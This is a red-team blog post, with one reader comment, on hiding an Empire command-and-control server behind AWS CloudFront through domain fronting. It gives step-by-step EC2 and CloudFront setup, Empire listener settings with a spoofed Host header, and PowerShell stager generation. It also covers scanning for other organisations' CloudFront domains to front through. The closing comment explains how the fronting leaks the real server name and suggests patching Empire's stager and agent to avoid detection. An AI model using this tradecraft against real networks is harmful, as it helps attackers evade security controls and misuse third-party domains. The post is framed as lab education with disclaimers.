Domain fronting is a new a technique to obfuscate the intended destination of HTTP(S) traffic. This allows attackers to circumvent security controls by masking the intended destination with “trusted” domains. In this blog post, I will setup AWS’s CloudFront CDN service to mask the destination of my Empire TeamServer.
DISCLAIMER
The information contained in this blog post is for educational purposes ONLY! HoldMyBeerSecurity.com/HoldMyBeer.xyz and its authors DO NOT hold any responsibility for any misuse or damage of the information provided in blog posts, discussions, activities, or exercises.
DISCLAIMER
What is domain fronting?
As stated in the Red-Team-Infrastructure-Wiki, “In a nutshell, traffic uses the DNS and SNI name of the trusted service provider, Google is used in the example below. When the traffic is received by the Edge Server (ex: located at gmail.com), the packet is forwarded to the Origin Server (ex: phish.appspot.com) specified in the packet’s Host header. Depending on the service provider, the Origin Server will either directly forward traffic to a specified domain, which we’ll point to our team server, or a proxy app will be required to perform the final hop forwarding.”
Network diagram
Create AWS resources
Create EC2 Empire teamserver
- Select “EC2” from the list of services
- Select “Launch instance”
- Step 1: Choose an Amazon Machine Image (AMI)
- Select “Ubuntu Server 16.04 LTS (HVM), SSD Volume Type”
- Step 2: Choose an Instance Type
- Select “t2.medium”
- Select “Configure Instance Details”
- Step 3: Configure Instance Details
- Select “default” for network
- Select “No preference” for Subnet
- Select “Enable” for “Auto-assign Public IP”
- Select “Next: Add storage”
- Step 4: Add Storage
- Enter “20” for “Size (GiB)”
- Select “Add tags”
- Step 5: Add tags
- Select “Add tag”
- Enter “Name” for key
- Enter “Redteam-teamserver” for value
- Select “Configure Security Group”
- Step 6: Configure Security Group
- Enter “Redteam-teamserver” for security group name
- For the SSH rule enter YOUR public IP for source
- My school has public IP range which I will use
- Select “Add rule”
- Set type to “HTTP”
- Enter “0.0.0.0/0” for source
- Select “Review and Launch”
- Step 7: Review Instance Launch
- Select Launch
- For the Key pair select “existing key pair” or “new key pair”
- Select “Launch instance”
- Select “View instances”
- Wait for new instance to initialize completely
- The “Status checks” column should be “2/2 checks passed”
- Copy the “IPv4 Public IP” for the new instance
Create CloudFront instance
- Select “CloudFront” from AWS services
- Select “Create Distribution”
- Select “Get started” under “Web” for delivery method
- Origin settings
- Enter “empire.hackinglab.beer” for Origin Domain Name
- Select “HTTP and HTTPS” for Viewer Protocol Policy
- Default Cache Behavior Settings
- Select “GET, HEAD, OPTIONS, PUT, POST, PATCH, DELETE” for Allowed HTTP Methods
- Select “All” for Forwarding Cookies
- Select “Forward all, cache based on all” for Query String Forwarding and Caching
- Select “Create distribution”
- The creation of this resource may take up to 20 mins.
- The creation of this resource may take up to 20 mins.
Setup/Configure domains via Namecheap
This guide assumes you already have domains purchased. You DO NOT have to use Namecheap but it is my registrar of choice :). I will be using the domain “hackinglab.beer” for my teamserver.
Hackinglab.beer – teamserver
- Log into Namecheap.com
- Select “Domain list” on the left
- Select “Manage” by the domain you wish to configure
- Select “Advance DNS” tab at the top
- Select “Add new record”
- Select “A record” for type
- Enter “empire” for host
- Enter “<EC2 public IP addr for Empire teamserver>” for value
- Select the check mark to save record
Testing CDN
- ssh [email protected]
- cd /tmp
- echo “<html><p>hello world</p></html>” > hello
- sudo python -m SimpleHTTPServer 80
- curl http://d0.awsstatic.com/hello –header ‘Host: <CloudFront domain name>’
- Look at the photo above to find the location of the domain name
Install/Setup Empire
- ssh [email protected]
- sudo apt update -y && sudo apt upgrade -y
- git clone https://github.com/EmpireProject/Empire.git
- cd Empire
- sudo ./setup/install.sh
- ./empire
Create listener
- listeners
- uselistener http
- set Name awsDF
- set Host http://d0.awsstatic.com:80
- set DefaultProfile
/admin/get.php,/news.php,/login/process.php|Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko|Host: <CloudFront domain name>
- execute
- back
Generate Powershell Stager
- usestager multi/launcher awsDF
- execute
Detonate Powershell stager
- Boot up a Windows VM
- Open a Powershell prompt
- Paste Powershell stager from above and hit enter
Hammer time
So let’s take domain fronting to the NEXT NEXT level. We will use a scrip created by rvrsh3ll to find domains that are utilizing CloudFront. This will allow us to utilize these domains as legitimate “destinations” for our traffic. This activity may be considering illegal so proceed with caution and only proceed if you have PERMISSION.
Rvrsh3ll – FindFrontableDomains
- git clone https://github.com/rvrsh3ll/FindFrontableDomains.git
- pip install -r requirements
- ./setup.sh
- python FindFrontableDomains.py –alexa 10000 –threads 20
Testing domain
- Select a domain that utilizes CloudFront
- Using a domain without authorization may be illegal, proceed with caution.
- curl http://<Domain using CloudFront>/hello –header ‘Host: <CloudFront domain name>’
Create Empire Listener
- Enter “exit” into Empire
- ./setup/reset.sh
- ./emire
- listeners
- uselistener http
- set Name awsDF
- set Host http://<Domain using CloudFront>:80
- set DefaultProfile
/admin/get.php,/news.php,/login/process.php|Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko|Host: <CloudFrontable domain name>
- execute
- back
Generate Powershell stager
- usestager multi/launcher awsDF
- execute
- Copy contents of stager
Detonate Powershell stager
- Boot up a Windows VM
- Open a Powershell prompt
- Paste Powershell stager from above and hit enter
DISCLAIMER
The information contained in this blog post is for educational purposes ONLY! HoldMyBeerSecurity.com/HoldMyBeer.xyz and its authors DO NOT hold any responsibility for any misuse or damage of the information provided in blog posts, discussions, activities, or exercises.
May be U know (may be not), but Empire has some vulns or mistakes with domain fronting. Therefor any advanced IPS and threat-intell systems can easy detect your originating domain.
U can fire wireshark and look to SSL traffic (exactly at Server Name Extension field of ssl-hello packet). So U cat see that this field is set to your originating domain, but no cloudfront or something else.
This is because some factors:
1) Empire send wrong pacjet at staging
Main idea is correct – establish connection to fronted domain and then DO NOT RESET tcp connection and use it for connect to your original domain. Main problem is that if first connection goes to AWS cloudfront. Then AWS gives 403 http code and .net framework reset tcp connection. So the second web request from empire will establish new tcp connection with your domain SNI.
To mitigate this U have to connect to specific URL of fronting domain so response will be 200 or 404 (no 403, 502 or some else). To od this – U heve to modify first empire stager…
2) domain fronting is not supported in PS agent (I suppose – they forgot add DF support in agent)
U have to modify empire ps1 agent to add support for domain fronting as it is in stager…